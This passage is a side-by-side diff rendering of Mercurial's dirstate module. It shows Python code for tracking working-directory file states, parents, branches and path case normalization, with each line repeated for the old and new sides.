166 self._otherparentset = otherparents
167 return nonnorm
167 return nonnorm
168
168
169 @propertycache
169 @propertycache
170 def _otherparentset(self):
170 def _otherparentset(self):
171 nonnorm, otherparents = nonnormalentries(self._map)
171 nonnorm, otherparents = nonnormalentries(self._map)
172 self._nonnormalset = nonnorm
172 self._nonnormalset = nonnorm
173 return otherparents
173 return otherparents
174
174
175 @propertycache
175 @propertycache
176 def _filefoldmap(self):
176 def _filefoldmap(self):
177 try:
177 try:
178 makefilefoldmap = parsers.make_file_foldmap
178 makefilefoldmap = parsers.make_file_foldmap
179 except AttributeError:
179 except AttributeError:
180 pass
180 pass
181 else:
181 else:
182 return makefilefoldmap(self._map, util.normcasespec,
182 return makefilefoldmap(self._map, util.normcasespec,
183 util.normcasefallback)
183 util.normcasefallback)
184
184
185 f = {}
185 f = {}
186 normcase = util.normcase
186 normcase = util.normcase
187 for name, s in self._map.iteritems():
187 for name, s in self._map.iteritems():
188 if s[0] != 'r':
188 if s[0] != 'r':
189 f[normcase(name)] = name
189 f[normcase(name)] = name
190 f['.'] = '.' # prevents useless util.fspath() invocation
190 f['.'] = '.' # prevents useless util.fspath() invocation
191 return f
191 return f
192
192
193 @propertycache
193 @propertycache
194 def _dirfoldmap(self):
194 def _dirfoldmap(self):
195 f = {}
195 f = {}
196 normcase = util.normcase
196 normcase = util.normcase
197 for name in self._dirs:
197 for name in self._dirs:
198 f[normcase(name)] = name
198 f[normcase(name)] = name
199 return f
199 return f
200
200
201 @property
201 @property
202 def _sparsematcher(self):
202 def _sparsematcher(self):
203 """The matcher for the sparse checkout.
203 """The matcher for the sparse checkout.
204
204
205 The working directory may not include every file from a manifest. The
205 The working directory may not include every file from a manifest. The
206 matcher obtained by this property will match a path if it is to be
206 matcher obtained by this property will match a path if it is to be
207 included in the working directory.
207 included in the working directory.
208 """
208 """
209 # TODO there is potential to cache this property. For now, the matcher
209 # TODO there is potential to cache this property. For now, the matcher
210 # is resolved on every access. (But the called function does use a
210 # is resolved on every access. (But the called function does use a
211 # cache to keep the lookup fast.)
211 # cache to keep the lookup fast.)
212 return self._sparsematchfn()
212 return self._sparsematchfn()
213
213
214 @repocache('branch')
214 @repocache('branch')
215 def _branch(self):
215 def _branch(self):
216 try:
216 try:
217 return self._opener.read("branch").strip() or "default"
217 return self._opener.read("branch").strip() or "default"
218 except IOError as inst:
218 except IOError as inst:
219 if inst.errno != errno.ENOENT:
219 if inst.errno != errno.ENOENT:
220 raise
220 raise
221 return "default"
221 return "default"
222
222
223 @propertycache
223 @propertycache
224 def _pl(self):
224 def _pl(self):
225 try:
225 try:
226 fp = self._opendirstatefile()
226 fp = self._opendirstatefile()
227 st = fp.read(40)
227 st = fp.read(40)
228 fp.close()
228 fp.close()
229 l = len(st)
229 l = len(st)
230 if l == 40:
230 if l == 40:
231 return st[:20], st[20:40]
231 return st[:20], st[20:40]
232 elif l > 0 and l < 40:
232 elif l > 0 and l < 40:
233 raise error.Abort(_('working directory state appears damaged!'))
233 raise error.Abort(_('working directory state appears damaged!'))
234 except IOError as err:
234 except IOError as err:
235 if err.errno != errno.ENOENT:
235 if err.errno != errno.ENOENT:
236 raise
236 raise
237 return [nullid, nullid]
237 return [nullid, nullid]
238
238
239 @propertycache
239 @propertycache
240 def _dirs(self):
240 def _dirs(self):
241 return util.dirs(self._map, 'r')
241 return util.dirs(self._map, 'r')
242
242
243 def dirs(self):
243 def dirs(self):
244 return self._dirs
244 return self._dirs
245
245
246 @rootcache('.hgignore')
246 @rootcache('.hgignore')
247 def _ignore(self):
247 def _ignore(self):
248 files = self._ignorefiles()
248 files = self._ignorefiles()
249 if not files:
249 if not files:
250 return matchmod.never(self._root, '')
250 return matchmod.never(self._root, '')
251
251
252 pats = ['include:%s' % f for f in files]
252 pats = ['include:%s' % f for f in files]
253 return matchmod.match(self._root, '', [], pats, warn=self._ui.warn)
253 return matchmod.match(self._root, '', [], pats, warn=self._ui.warn)
254
254
255 @propertycache
255 @propertycache
256 def _slash(self):
256 def _slash(self):
257 return self._ui.configbool('ui', 'slash') and pycompat.ossep != '/'
257 return self._ui.configbool('ui', 'slash') and pycompat.ossep != '/'
258
258
259 @propertycache
259 @propertycache
260 def _checklink(self):
260 def _checklink(self):
261 return util.checklink(self._root)
261 return util.checklink(self._root)
262
262
263 @propertycache
263 @propertycache
264 def _checkexec(self):
264 def _checkexec(self):
265 return util.checkexec(self._root)
265 return util.checkexec(self._root)
266
266
267 @propertycache
267 @propertycache
268 def _checkcase(self):
268 def _checkcase(self):
269 return not util.fscasesensitive(self._join('.hg'))
269 return not util.fscasesensitive(self._join('.hg'))
270
270
271 def _join(self, f):
271 def _join(self, f):
272 # much faster than os.path.join()
272 # much faster than os.path.join()
273 # it's safe because f is always a relative path
273 # it's safe because f is always a relative path
274 return self._rootdir + f
274 return self._rootdir + f
275
275
276 def flagfunc(self, buildfallback):
276 def flagfunc(self, buildfallback):
277 if self._checklink and self._checkexec:
277 if self._checklink and self._checkexec:
278 def f(x):
278 def f(x):
279 try:
279 try:
280 st = os.lstat(self._join(x))
280 st = os.lstat(self._join(x))
281 if util.statislink(st):
281 if util.statislink(st):
282 return 'l'
282 return 'l'
283 if util.statisexec(st):
283 if util.statisexec(st):
284 return 'x'
284 return 'x'
285 except OSError:
285 except OSError:
286 pass
286 pass
287 return ''
287 return ''
288 return f
288 return f
289
289
290 fallback = buildfallback()
290 fallback = buildfallback()
291 if self._checklink:
291 if self._checklink:
292 def f(x):
292 def f(x):
293 if os.path.islink(self._join(x)):
293 if os.path.islink(self._join(x)):
294 return 'l'
294 return 'l'
295 if 'x' in fallback(x):
295 if 'x' in fallback(x):
296 return 'x'
296 return 'x'
297 return ''
297 return ''
298 return f
298 return f
299 if self._checkexec:
299 if self._checkexec:
300 def f(x):
300 def f(x):
301 if 'l' in fallback(x):
301 if 'l' in fallback(x):
302 return 'l'
302 return 'l'
303 if util.isexec(self._join(x)):
303 if util.isexec(self._join(x)):
304 return 'x'
304 return 'x'
305 return ''
305 return ''
306 return f
306 return f
307 else:
307 else:
308 return fallback
308 return fallback
309
309
310 @propertycache
310 @propertycache
311 def _cwd(self):
311 def _cwd(self):
312 # internal config: ui.forcecwd
312 # internal config: ui.forcecwd
313 forcecwd = self._ui.config('ui', 'forcecwd')
313 forcecwd = self._ui.config('ui', 'forcecwd')
314 if forcecwd:
314 if forcecwd:
315 return forcecwd
315 return forcecwd
316 return pycompat.getcwd()
316 return pycompat.getcwd()
317
317
318 def getcwd(self):
318 def getcwd(self):
319 '''Return the path from which a canonical path is calculated.
319 '''Return the path from which a canonical path is calculated.
320
320
321 This path should be used to resolve file patterns or to convert
321 This path should be used to resolve file patterns or to convert
322 canonical paths back to file paths for display. It shouldn't be
322 canonical paths back to file paths for display. It shouldn't be
323 used to get real file paths. Use vfs functions instead.
323 used to get real file paths. Use vfs functions instead.
324 '''
324 '''
325 cwd = self._cwd
325 cwd = self._cwd
326 if cwd == self._root:
326 if cwd == self._root:
327 return ''
327 return ''
328 # self._root ends with a path separator if self._root is '/' or 'C:\'
328 # self._root ends with a path separator if self._root is '/' or 'C:\'
329 rootsep = self._root
329 rootsep = self._root
330 if not util.endswithsep(rootsep):
330 if not util.endswithsep(rootsep):
331 rootsep += pycompat.ossep
331 rootsep += pycompat.ossep
332 if cwd.startswith(rootsep):
332 if cwd.startswith(rootsep):
333 return cwd[len(rootsep):]
333 return cwd[len(rootsep):]
334 else:
334 else:
335 # we're outside the repo. return an absolute path.
335 # we're outside the repo. return an absolute path.
336 return cwd
336 return cwd
337
337
338 def pathto(self, f, cwd=None):
338 def pathto(self, f, cwd=None):
339 if cwd is None:
339 if cwd is None:
340 cwd = self.getcwd()
340 cwd = self.getcwd()
341 path = util.pathto(self._root, cwd, f)
341 path = util.pathto(self._root, cwd, f)
342 if self._slash:
342 if self._slash:
343 return util.pconvert(path)
343 return util.pconvert(path)
344 return path
344 return path
345
345
346 def __getitem__(self, key):
346 def __getitem__(self, key):
347 '''Return the current state of key (a filename) in the dirstate.
347 '''Return the current state of key (a filename) in the dirstate.
348
348
349 States are:
349 States are:
350 n normal
350 n normal
351 m needs merging
351 m needs merging
352 r marked for removal
352 r marked for removal
353 a marked for addition
353 a marked for addition
354 ? not tracked
354 ? not tracked
355 '''
355 '''
356 return self._map.get(key, ("?",))[0]
356 return self._map.get(key, ("?",))[0]
357
357
358 def __contains__(self, key):
358 def __contains__(self, key):
359 return key in self._map
359 return key in self._map
360
360
361 def __iter__(self):
361 def __iter__(self):
362 return iter(sorted(self._map))
362 return iter(sorted(self._map))
363
363
364 def items(self):
364 def items(self):
365 return self._map.iteritems()
365 return self._map.iteritems()
366
366
367 iteritems = items
367 iteritems = items
368
368
369 def parents(self):
369 def parents(self):
370 return [self._validate(p) for p in self._pl]
370 return [self._validate(p) for p in self._pl]
371
371
372 def p1(self):
372 def p1(self):
373 return self._validate(self._pl[0])
373 return self._validate(self._pl[0])
374
374
375 def p2(self):
375 def p2(self):
376 return self._validate(self._pl[1])
376 return self._validate(self._pl[1])
377
377
378 def branch(self):
378 def branch(self):
379 return encoding.tolocal(self._branch)
379 return encoding.tolocal(self._branch)
380
380
381 def setparents(self, p1, p2=nullid):
381 def setparents(self, p1, p2=nullid):
382 """Set dirstate parents to p1 and p2.
382 """Set dirstate parents to p1 and p2.
383
383
384 When moving from two parents to one, 'm' merged entries a
384 When moving from two parents to one, 'm' merged entries a
385 adjusted to normal and previous copy records discarded and
385 adjusted to normal and previous copy records discarded and
386 returned by the call.
386 returned by the call.
387
387
388 See localrepo.setparents()
388 See localrepo.setparents()
389 """
389 """
390 if self._parentwriters == 0:
390 if self._parentwriters == 0:
391 raise ValueError("cannot set dirstate parent without "
391 raise ValueError("cannot set dirstate parent without "
392 "calling dirstate.beginparentchange")
392 "calling dirstate.beginparentchange")
393
393
394 self._dirty = self._dirtypl = True
394 self._dirty = self._dirtypl = True
395 oldp2 = self._pl[1]
395 oldp2 = self._pl[1]
396 if self._origpl is None:
396 if self._origpl is None:
397 self._origpl = self._pl
397 self._origpl = self._pl
398 self._pl = p1, p2
398 self._pl = p1, p2
399 copies = {}
399 copies = {}
400 if oldp2 != nullid and p2 == nullid:
400 if oldp2 != nullid and p2 == nullid:
401 candidatefiles = self._nonnormalset.union(self._otherparentset)
401 candidatefiles = self._nonnormalset.union(self._otherparentset)
402 for f in candidatefiles:
402 for f in candidatefiles:
403 s = self._map.get(f)
403 s = self._map.get(f)
404 if s is None:
404 if s is None:
405 continue
405 continue
406
406
407 # Discard 'm' markers when moving away from a merge state
407 # Discard 'm' markers when moving away from a merge state
408 if s[0] == 'm':
408 if s[0] == 'm':
409 if f in self._copymap:
409 if f in self._copymap:
410 copies[f] = self._copymap[f]
410 copies[f] = self._copymap[f]
411 self.normallookup(f)
411 self.normallookup(f)
412 # Also fix up otherparent markers
412 # Also fix up otherparent markers
413 elif s[0] == 'n' and s[2] == -2:
413 elif s[0] == 'n' and s[2] == -2:
414 if f in self._copymap:
414 if f in self._copymap:
415 copies[f] = self._copymap[f]
415 copies[f] = self._copymap[f]
416 self.add(f)
416 self.add(f)
417 return copies
417 return copies
418
418
419 def setbranch(self, branch):
419 def setbranch(self, branch):
420 self._branch = encoding.fromlocal(branch)
420 self._branch = encoding.fromlocal(branch)
421 f = self._opener('branch', 'w', atomictemp=True, checkambig=True)
421 f = self._opener('branch', 'w', atomictemp=True, checkambig=True)
422 try:
422 try:
423 f.write(self._branch + '\n')
423 f.write(self._branch + '\n')
424 f.close()
424 f.close()
425
425
426 # make sure filecache has the correct stat info for _branch after
426 # make sure filecache has the correct stat info for _branch after
427 # replacing the underlying file
427 # replacing the underlying file
428 ce = self._filecache['_branch']
428 ce = self._filecache['_branch']
429 if ce:
429 if ce:
430 ce.refresh()
430 ce.refresh()
431 except: # re-raises
431 except: # re-raises
432 f.discard()
432 f.discard()
433 raise
433 raise
434
434
435 def _opendirstatefile(self):
435 def _opendirstatefile(self):
436 fp, mode = txnutil.trypending(self._root, self._opener, self._filename)
436 fp, mode = txnutil.trypending(self._root, self._opener, self._filename)
437 if self._pendingmode is not None and self._pendingmode != mode:
437 if self._pendingmode is not None and self._pendingmode != mode:
438 fp.close()
438 fp.close()
439 raise error.Abort(_('working directory state may be '
439 raise error.Abort(_('working directory state may be '
440 'changed parallelly'))
440 'changed parallelly'))
441 self._pendingmode = mode
441 self._pendingmode = mode
442 return fp
442 return fp
443
443
444 def _read(self):
444 def _read(self):
445 self._map = {}
445 self._map = {}
446 self._copymap = {}
446 self._copymap = {}
447 # ignore HG_PENDING because identity is used only for writing
447 # ignore HG_PENDING because identity is used only for writing
448 self._identity = util.filestat.frompath(
448 self._identity = util.filestat.frompath(
449 self._opener.join(self._filename))
449 self._opener.join(self._filename))
450 try:
450 try:
451 fp = self._opendirstatefile()
451 fp = self._opendirstatefile()
452 try:
452 try:
453 st = fp.read()
453 st = fp.read()
454 finally:
454 finally:
455 fp.close()
455 fp.close()
456 except IOError as err:
456 except IOError as err:
457 if err.errno != errno.ENOENT:
457 if err.errno != errno.ENOENT:
458 raise
458 raise
459 return
459 return
460 if not st:
460 if not st:
461 return
461 return
462
462
463 if util.safehasattr(parsers, 'dict_new_presized'):
463 if util.safehasattr(parsers, 'dict_new_presized'):
464 # Make an estimate of the number of files in the dirstate based on
464 # Make an estimate of the number of files in the dirstate based on
465 # its size. From a linear regression on a set of real-world repos,
465 # its size. From a linear regression on a set of real-world repos,
466 # all over 10,000 files, the size of a dirstate entry is 85
466 # all over 10,000 files, the size of a dirstate entry is 85
467 # bytes. The cost of resizing is significantly higher than the cost
467 # bytes. The cost of resizing is significantly higher than the cost
468 # of filling in a larger presized dict, so subtract 20% from the
468 # of filling in a larger presized dict, so subtract 20% from the
469 # size.
469 # size.
470 #
470 #
471 # This heuristic is imperfect in many ways, so in a future dirstate
471 # This heuristic is imperfect in many ways, so in a future dirstate
472 # format update it makes sense to just record the number of entries
472 # format update it makes sense to just record the number of entries
473 # on write.
473 # on write.
474 self._map = parsers.dict_new_presized(len(st) / 71)
474 self._map = parsers.dict_new_presized(len(st) / 71)
475
475
476 # Python's garbage collector triggers a GC each time a certain number
476 # Python's garbage collector triggers a GC each time a certain number
477 # of container objects (the number being defined by
477 # of container objects (the number being defined by
478 # gc.get_threshold()) are allocated. parse_dirstate creates a tuple
478 # gc.get_threshold()) are allocated. parse_dirstate creates a tuple
479 # for each file in the dirstate. The C version then immediately marks
479 # for each file in the dirstate. The C version then immediately marks
480 # them as not to be tracked by the collector. However, this has no
480 # them as not to be tracked by the collector. However, this has no
481 # effect on when GCs are triggered, only on what objects the GC looks
481 # effect on when GCs are triggered, only on what objects the GC looks
482 # into. This means that O(number of files) GCs are unavoidable.
482 # into. This means that O(number of files) GCs are unavoidable.
483 # Depending on when in the process's lifetime the dirstate is parsed,
483 # Depending on when in the process's lifetime the dirstate is parsed,
484 # this can get very expensive. As a workaround, disable GC while
484 # this can get very expensive. As a workaround, disable GC while
485 # parsing the dirstate.
485 # parsing the dirstate.
486 #
486 #
487 # (we cannot decorate the function directly since it is in a C module)
487 # (we cannot decorate the function directly since it is in a C module)
488 parse_dirstate = util.nogc(parsers.parse_dirstate)
488 parse_dirstate = util.nogc(parsers.parse_dirstate)
489 p = parse_dirstate(self._map, self._copymap, st)
489 p = parse_dirstate(self._map, self._copymap, st)
490 if not self._dirtypl:
490 if not self._dirtypl:
491 self._pl = p
491 self._pl = p
492
492
493 def invalidate(self):
493 def invalidate(self):
494 '''Causes the next access to reread the dirstate.
494 '''Causes the next access to reread the dirstate.
495
495
496 This is different from localrepo.invalidatedirstate() because it always
496 This is different from localrepo.invalidatedirstate() because it always
497 rereads the dirstate. Use localrepo.invalidatedirstate() if you want to
497 rereads the dirstate. Use localrepo.invalidatedirstate() if you want to
498 check whether the dirstate has changed before rereading it.'''
498 check whether the dirstate has changed before rereading it.'''
499
499
500 for a in ("_map", "_copymap", "_identity",
500 for a in ("_map", "_copymap", "_identity",
501 "_filefoldmap", "_dirfoldmap", "_branch",
501 "_filefoldmap", "_dirfoldmap", "_branch",
502 "_pl", "_dirs", "_ignore", "_nonnormalset",
502 "_pl", "_dirs", "_ignore", "_nonnormalset",
503 "_otherparentset"):
503 "_otherparentset"):
504 if a in self.__dict__:
504 if a in self.__dict__:
505 delattr(self, a)
505 delattr(self, a)
506 self._lastnormaltime = 0
506 self._lastnormaltime = 0
507 self._dirty = False
507 self._dirty = False
508 self._updatedfiles.clear()
508 self._updatedfiles.clear()
509 self._parentwriters = 0
509 self._parentwriters = 0
510 self._origpl = None
510 self._origpl = None
511
511
512 def copy(self, source, dest):
512 def copy(self, source, dest):
513 """Mark dest as a copy of source. Unmark dest if source is None."""
513 """Mark dest as a copy of source. Unmark dest if source is None."""
514 if source == dest:
514 if source == dest:
515 return
515 return
516 self._dirty = True
516 self._dirty = True
517 if source is not None:
517 if source is not None:
518 self._copymap[dest] = source
518 self._copymap[dest] = source
519 self._updatedfiles.add(source)
519 self._updatedfiles.add(source)
520 self._updatedfiles.add(dest)
520 self._updatedfiles.add(dest)
521 elif dest in self._copymap:
521 elif dest in self._copymap:
522 del self._copymap[dest]
522 del self._copymap[dest]
523 self._updatedfiles.add(dest)
523 self._updatedfiles.add(dest)
524
524
525 def copied(self, file):
525 def copied(self, file):
526 return self._copymap.get(file, None)
526 return self._copymap.get(file, None)
527
527
528 def copies(self):
528 def copies(self):
529 return self._copymap
529 return self._copymap
530
530
531 def _droppath(self, f):
531 def _droppath(self, f):
532 if self[f] not in "?r" and "_dirs" in self.__dict__:
532 if self[f] not in "?r" and "_dirs" in self.__dict__:
533 self._dirs.delpath(f)
533 self._dirs.delpath(f)
534
534
535 if "_filefoldmap" in self.__dict__:
535 if "_filefoldmap" in self.__dict__:
536 normed = util.normcase(f)
536 normed = util.normcase(f)
537 if normed in self._filefoldmap:
537 if normed in self._filefoldmap:
538 del self._filefoldmap[normed]
538 del self._filefoldmap[normed]
539
539
540 self._updatedfiles.add(f)
540 self._updatedfiles.add(f)
541
541
542 def _addpath(self, f, state, mode, size, mtime):
542 def _addpath(self, f, state, mode, size, mtime):
543 oldstate = self[f]
543 oldstate = self[f]
544 if state == 'a' or oldstate == 'r':
544 if state == 'a' or oldstate == 'r':
545 scmutil.checkfilename(f)
545 scmutil.checkfilename(f)
546 if f in self._dirs:
546 if f in self._dirs:
547 raise error.Abort(_('directory %r already in dirstate') % f)
547 raise error.Abort(_('directory %r already in dirstate') % f)
548 # shadows
548 # shadows
549 for d in util.finddirs(f):
549 for d in util.finddirs(f):
550 if d in self._dirs:
550 if d in self._dirs:
551 break
551 break
552 if d in self._map and self[d] != 'r':
552 if d in self._map and self[d] != 'r':
553 raise error.Abort(
553 raise error.Abort(
554 _('file %r in dirstate clashes with %r') % (d, f))
554 _('file %r in dirstate clashes with %r') % (d, f))
555 if oldstate in "?r" and "_dirs" in self.__dict__:
555 if oldstate in "?r" and "_dirs" in self.__dict__:
556 self._dirs.addpath(f)
556 self._dirs.addpath(f)
557 self._dirty = True
557 self._dirty = True
558 self._updatedfiles.add(f)
558 self._updatedfiles.add(f)
559 self._map[f] = dirstatetuple(state, mode, size, mtime)
559 self._map[f] = dirstatetuple(state, mode, size, mtime)
560 if state != 'n' or mtime == -1:
560 if state != 'n' or mtime == -1:
561 self._nonnormalset.add(f)
561 self._nonnormalset.add(f)
562 if size == -2:
562 if size == -2:
563 self._otherparentset.add(f)
563 self._otherparentset.add(f)
564
564
565 def normal(self, f):
565 def normal(self, f):
566 '''Mark a file normal and clean.'''
566 '''Mark a file normal and clean.'''
567 s = os.lstat(self._join(f))
567 s = os.lstat(self._join(f))
568 mtime = s.st_mtime
568 mtime = s.st_mtime
569 self._addpath(f, 'n', s.st_mode,
569 self._addpath(f, 'n', s.st_mode,
570 s.st_size & _rangemask, mtime & _rangemask)
570 s.st_size & _rangemask, mtime & _rangemask)
571 if f in self._copymap:
571 if f in self._copymap:
572 del self._copymap[f]
572 del self._copymap[f]
573 if f in self._nonnormalset:
573 if f in self._nonnormalset:
574 self._nonnormalset.remove(f)
574 self._nonnormalset.remove(f)
575 if mtime > self._lastnormaltime:
575 if mtime > self._lastnormaltime:
576 # Remember the most recent modification timeslot for status(),
576 # Remember the most recent modification timeslot for status(),
577 # to make sure we won't miss future size-preserving file content
577 # to make sure we won't miss future size-preserving file content
578 # modifications that happen within the same timeslot.
578 # modifications that happen within the same timeslot.
579 self._lastnormaltime = mtime
579 self._lastnormaltime = mtime
580
580
581 def normallookup(self, f):
581 def normallookup(self, f):
582 '''Mark a file normal, but possibly dirty.'''
582 '''Mark a file normal, but possibly dirty.'''
583 if self._pl[1] != nullid and f in self._map:
583 if self._pl[1] != nullid and f in self._map:
584 # if there is a merge going on and the file was either
584 # if there is a merge going on and the file was either
585 # in state 'm' (-1) or coming from other parent (-2) before
585 # in state 'm' (-1) or coming from other parent (-2) before
586 # being removed, restore that state.
586 # being removed, restore that state.
587 entry = self._map[f]
587 entry = self._map[f]
588 if entry[0] == 'r' and entry[2] in (-1, -2):
588 if entry[0] == 'r' and entry[2] in (-1, -2):
589 source = self._copymap.get(f)
589 source = self._copymap.get(f)
590 if entry[2] == -1:
590 if entry[2] == -1:
591 self.merge(f)
591 self.merge(f)
592 elif entry[2] == -2:
592 elif entry[2] == -2:
593 self.otherparent(f)
593 self.otherparent(f)
594 if source:
594 if source:
595 self.copy(source, f)
595 self.copy(source, f)
596 return
596 return
597 if entry[0] == 'm' or entry[0] == 'n' and entry[2] == -2:
597 if entry[0] == 'm' or entry[0] == 'n' and entry[2] == -2:
598 return
598 return
599 self._addpath(f, 'n', 0, -1, -1)
599 self._addpath(f, 'n', 0, -1, -1)
600 if f in self._copymap:
600 if f in self._copymap:
601 del self._copymap[f]
601 del self._copymap[f]
602 if f in self._nonnormalset:
602 if f in self._nonnormalset:
603 self._nonnormalset.remove(f)
603 self._nonnormalset.remove(f)
604
604
605 def otherparent(self, f):
605 def otherparent(self, f):
606 '''Mark as coming from the other parent, always dirty.'''
606 '''Mark as coming from the other parent, always dirty.'''
607 if self._pl[1] == nullid:
607 if self._pl[1] == nullid:
608 raise error.Abort(_("setting %r to other parent "
608 raise error.Abort(_("setting %r to other parent "
609 "only allowed in merges") % f)
609 "only allowed in merges") % f)
610 if f in self and self[f] == 'n':
610 if f in self and self[f] == 'n':
611 # merge-like
611 # merge-like
612 self._addpath(f, 'm', 0, -2, -1)
612 self._addpath(f, 'm', 0, -2, -1)
613 else:
613 else:
614 # add-like
614 # add-like
615 self._addpath(f, 'n', 0, -2, -1)
615 self._addpath(f, 'n', 0, -2, -1)
616
616
617 if f in self._copymap:
617 if f in self._copymap:
618 del self._copymap[f]
618 del self._copymap[f]
619
619
620 def add(self, f):
620 def add(self, f):
621 '''Mark a file added.'''
621 '''Mark a file added.'''
622 self._addpath(f, 'a', 0, -1, -1)
622 self._addpath(f, 'a', 0, -1, -1)
623 if f in self._copymap:
623 if f in self._copymap:
624 del self._copymap[f]
624 del self._copymap[f]
625
625
626 def remove(self, f):
626 def remove(self, f):
627 '''Mark a file removed.'''
627 '''Mark a file removed.'''
628 self._dirty = True
628 self._dirty = True
629 self._droppath(f)
629 self._droppath(f)
630 size = 0
630 size = 0
631 if self._pl[1] != nullid and f in self._map:
631 if self._pl[1] != nullid and f in self._map:
632 # backup the previous state
632 # backup the previous state
633 entry = self._map[f]
633 entry = self._map[f]
634 if entry[0] == 'm': # merge
634 if entry[0] == 'm': # merge
635 size = -1
635 size = -1
636 elif entry[0] == 'n' and entry[2] == -2: # other parent
636 elif entry[0] == 'n' and entry[2] == -2: # other parent
637 size = -2
637 size = -2
638 self._otherparentset.add(f)
638 self._otherparentset.add(f)
639 self._map[f] = dirstatetuple('r', 0, size, 0)
639 self._map[f] = dirstatetuple('r', 0, size, 0)
640 self._nonnormalset.add(f)
640 self._nonnormalset.add(f)
641 if size == 0 and f in self._copymap:
641 if size == 0 and f in self._copymap:
642 del self._copymap[f]
642 del self._copymap[f]
643
643
644 def merge(self, f):
644 def merge(self, f):
645 '''Mark a file merged.'''
645 '''Mark a file merged.'''
646 if self._pl[1] == nullid:
646 if self._pl[1] == nullid:
647 return self.normallookup(f)
647 return self.normallookup(f)
648 return self.otherparent(f)
648 return self.otherparent(f)
649
649
650 def drop(self, f):
650 def drop(self, f):
651 '''Drop a file from the dirstate'''
651 '''Drop a file from the dirstate'''
652 if f in self._map:
652 if f in self._map:
653 self._dirty = True
653 self._dirty = True
654 self._droppath(f)
654 self._droppath(f)
655 del self._map[f]
655 del self._map[f]
656 if f in self._nonnormalset:
656 if f in self._nonnormalset:
657 self._nonnormalset.remove(f)
657 self._nonnormalset.remove(f)
658 if f in self._copymap:
658 if f in self._copymap:
659 del self._copymap[f]
659 del self._copymap[f]
660
660
661 def _discoverpath(self, path, normed, ignoremissing, exists, storemap):
661 def _discoverpath(self, path, normed, ignoremissing, exists, storemap):
662 if exists is None:
662 if exists is None:
663 exists = os.path.lexists(os.path.join(self._root, path))
663 exists = os.path.lexists(os.path.join(self._root, path))
664 if not exists:
664 if not exists:
665 # Maybe a path component exists
665 # Maybe a path component exists
666 if not ignoremissing and '/' in path:
666 if not ignoremissing and '/' in path:
667 d, f = path.rsplit('/', 1)
667 d, f = path.rsplit('/', 1)
668 d = self._normalize(d, False, ignoremissing, None)
668 d = self._normalize(d, False, ignoremissing, None)
669 folded = d + "/" + f
669 folded = d + "/" + f
670 else:
670 else:
671 # No path components, preserve original case
671 # No path components, preserve original case
672 folded = path
672 folded = path
673 else:
673 else:
674 # recursively normalize leading directory components
674 # recursively normalize leading directory components
675 # against dirstate
675 # against dirstate
676 if '/' in normed:
676 if '/' in normed:
677 d, f = normed.rsplit('/', 1)
677 d, f = normed.rsplit('/', 1)
678 d = self._normalize(d, False, ignoremissing, True)
678 d = self._normalize(d, False, ignoremissing, True)
679 r = self._root + "/" + d
679 r = self._root + "/" + d
680 folded = d + "/" + util.fspath(f, r)
680 folded = d + "/" + util.fspath(f, r)
681 else:
681 else:
682 folded = util.fspath(normed, self._root)
682 folded = util.fspath(normed, self._root)
683 storemap[normed] = folded
683 storemap[normed] = folded
684
684
685 return folded
685 return folded
686
686
687 def _normalizefile(self, path, isknown, ignoremissing=False, exists=None):
687 def _normalizefile(self, path, isknown, ignoremissing=False, exists=None):
688 normed = util.normcase(path)
688 normed = util.normcase(path)
689 folded = self._filefoldmap.get(normed, None)
689 folded = self._filefoldmap.get(normed, None)
690 if folded is None:
690 if folded is None:
691 if isknown:
691 if isknown:
692 folded = path
692 folded = path
693 else:
693 else:
694 folded = self._discoverpath(path, normed, ignoremissing, exists,
694 folded = self._discoverpath(path, normed, ignoremissing, exists,
695 self._filefoldmap)
695 self._filefoldmap)
696 return folded
696 return folded
697
697
698 def _normalize(self, path, isknown, ignoremissing=False, exists=None):
698 def _normalize(self, path, isknown, ignoremissing=False, exists=None):
699 normed = util.normcase(path)
699 normed = util.normcase(path)
700 folded = self._filefoldmap.get(normed, None)
700 folded = self._filefoldmap.get(normed, None)
701 if folded is None:
701 if folded is None:
702 folded = self._dirfoldmap.get(normed, None)
702 folded = self._dirfoldmap.get(normed, None)
703 if folded is None:
703 if folded is None:
704 if isknown:
704 if isknown:
705 folded = path
705 folded = path
706 else:
706 else:
707 # store discovered result in dirfoldmap so that future
707 # store discovered result in dirfoldmap so that future
708 # normalizefile calls don't start matching directories
708 # normalizefile calls don't start matching directories
709 folded = self._discoverpath(path, normed, ignoremissing, exists,
709 folded = self._discoverpath(path, normed, ignoremissing, exists,
710 self._dirfoldmap)
710 self._dirfoldmap)
711 return folded
711 return folded
712
712
713 def normalize(self, path, isknown=False, ignoremissing=False):
713 def normalize(self, path, isknown=False, ignoremissing=False):
714 '''
714 '''
715 normalize the case of a pathname when on a casefolding filesystem
715 normalize the case of a pathname when on a casefolding filesystem
716
716
717 isknown specifies whether the filename came from walking the
717 isknown specifies whether the filename came from walking the
718 disk, to avoid extra filesystem access.
718 disk, to avoid extra filesystem access.
719
719
720 If ignoremissing is True, missing path are returned
720 If ignoremissing is True, missing path are returned
721 unchanged. Otherwise, we try harder to normalize possibly
721 unchanged. Otherwise, we try harder to normalize possibly
722 existing path components.
722 existing path components.
723
723
724 The normalized case is determined based on the following precedence:
724 The normalized case is determined based on the following precedence:
725
725
726 - version of name already stored in the dirstate
726 - version of name already stored in the dirstate
727 - version of name stored on disk
727 - version of name stored on disk
728 - version provided via command arguments
728 - version provided via command arguments
729 '''
729 '''
730
730
731 if self._checkcase:
731 if self._checkcase:
732 return self._normalize(path, isknown, ignoremissing)
732 return self._normalize(path, isknown, ignoremissing)
733 return path
733 return path
734
734
735 def clear(self):
735 def clear(self):
736 self._map = {}
736 self._map = {}
737 self._nonnormalset = set()
737 self._nonnormalset = set()
738 self._otherparentset = set()
738 self._otherparentset = set()
739 if "_dirs" in self.__dict__:
739 if "_dirs" in self.__dict__:
740 delattr(self, "_dirs")
740 delattr(self, "_dirs")
741 self._copymap = {}
741 self._copymap = {}
742 self._pl = [nullid, nullid]
742 self._pl = [nullid, nullid]
743 self._lastnormaltime = 0
743 self._lastnormaltime = 0
744 self._updatedfiles.clear()
744 self._updatedfiles.clear()
745 self._dirty = True
745 self._dirty = True
746
746
747 def rebuild(self, parent, allfiles, changedfiles=None):
747 def rebuild(self, parent, allfiles, changedfiles=None):
748 if changedfiles is None:
748 if changedfiles is None:
749 # Rebuild entire dirstate
749 # Rebuild entire dirstate
750 changedfiles = allfiles
750 changedfiles = allfiles
751 lastnormaltime = self._lastnormaltime
751 lastnormaltime = self._lastnormaltime
752 self.clear()
752 self.clear()
753 self._lastnormaltime = lastnormaltime
